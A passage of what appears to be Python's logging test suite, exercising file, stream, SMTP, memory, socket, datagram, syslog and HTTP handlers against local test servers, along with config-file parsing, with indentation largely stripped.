self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatedly
# raises this error. We swallow it only if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:param bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:param bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
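# A minimal sketch (not exercised by the tests) of the intended pattern for the
# helper servers above, assuming threading is available (they are only defined
# under "if threading:"): construct a server with a handler callable, start it,
# wait until it is ready, and stop it when done.
def demo_server_helper_usage():
    received = []
    def handler(request):
        received.append(request)   # runs on the server thread
    server = TestTCPServer(('localhost', 0), handler, poll_interval=0.1)
    server.start()
    server.ready.wait()
    # ... point a SocketHandler at ('localhost', server.port) and log here ...
    server.stop(2.0)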
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
TIMEOUT = 8.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT) # Issue #14314: don't wait forever
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
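# A minimal sketch (not exercised by the tests) of the flush criteria checked
# above: MemoryHandler buffers records and flushes them to its target when
# either its capacity is reached or a record at or above flushLevel arrives.
def demo_memory_handler_flush():
    target = logging.StreamHandler(io.StringIO())
    mem = logging.handlers.MemoryHandler(capacity=3, flushLevel=logging.ERROR,
                                         target=target)
    demo_logger = logging.getLogger('memory_handler_demo')
    demo_logger.propagate = False
    demo_logger.setLevel(logging.DEBUG)
    demo_logger.addHandler(mem)
    demo_logger.debug('buffered')             # held until a flush is triggered
    demo_logger.error('flushes immediately')  # >= flushLevel, so the buffer drains
    demo_logger.removeHandler(mem)
    mem.close()
    target.close()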
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
if threading:
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
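# SocketHandler sends each record as a 4-byte big-endian length prefix
# followed by a pickled dict of the record's attributes, so read the
# length first and then the payload.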
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # dummy value, used only for the size of the length prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
if threading:
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls(('localhost', server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
self.server.stop(2.0)
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
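# '<11>' is the syslog priority prefix: facility LOG_USER (1) << 3 plus
# severity 'err' (3) gives 11; append_nul (the default) adds a trailing NUL.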
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
@unittest.skipUnless(threading, 'Threading required for this test.')
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if threading and hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
os.remove(self.address)
@unittest.skipUnless(threading, 'Threading required for this test.')
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except Exception:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context)
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
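# A minimal sketch (not exercised by the tests) of attaching an HTTPHandler
# outside this test harness: each record's attribute dict is sent to a web
# server as URL-encoded GET or POST data. The host and path below are
# placeholders, not a real endpoint.
def demo_http_handler_setup():
    handler = logging.handlers.HTTPHandler('localhost:8080', '/log', method='POST')
    demo_logger = logging.getLogger('http_demo')
    demo_logger.addHandler(handler)
    # demo_logger.error('hello')  # would POST name=http_demo&msg=hello&... to /log
    demo_logger.removeHandler(handler)
    handler.close()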
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assert_survival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
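# A minimal sketch (not exercised by the tests) of the persistence property
# tested above: getLogger() returns the same object for a given name, so
# configuration survives even after the caller drops its own reference.
def demo_logger_persistence():
    first = logging.getLogger('persistence_demo')
    first.setLevel(logging.DEBUG)
    del first
    again = logging.getLogger('persistence_demo')
    assert again.level == logging.DEBUG   # the cached logger kept its level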
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
#Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
#Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
#Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
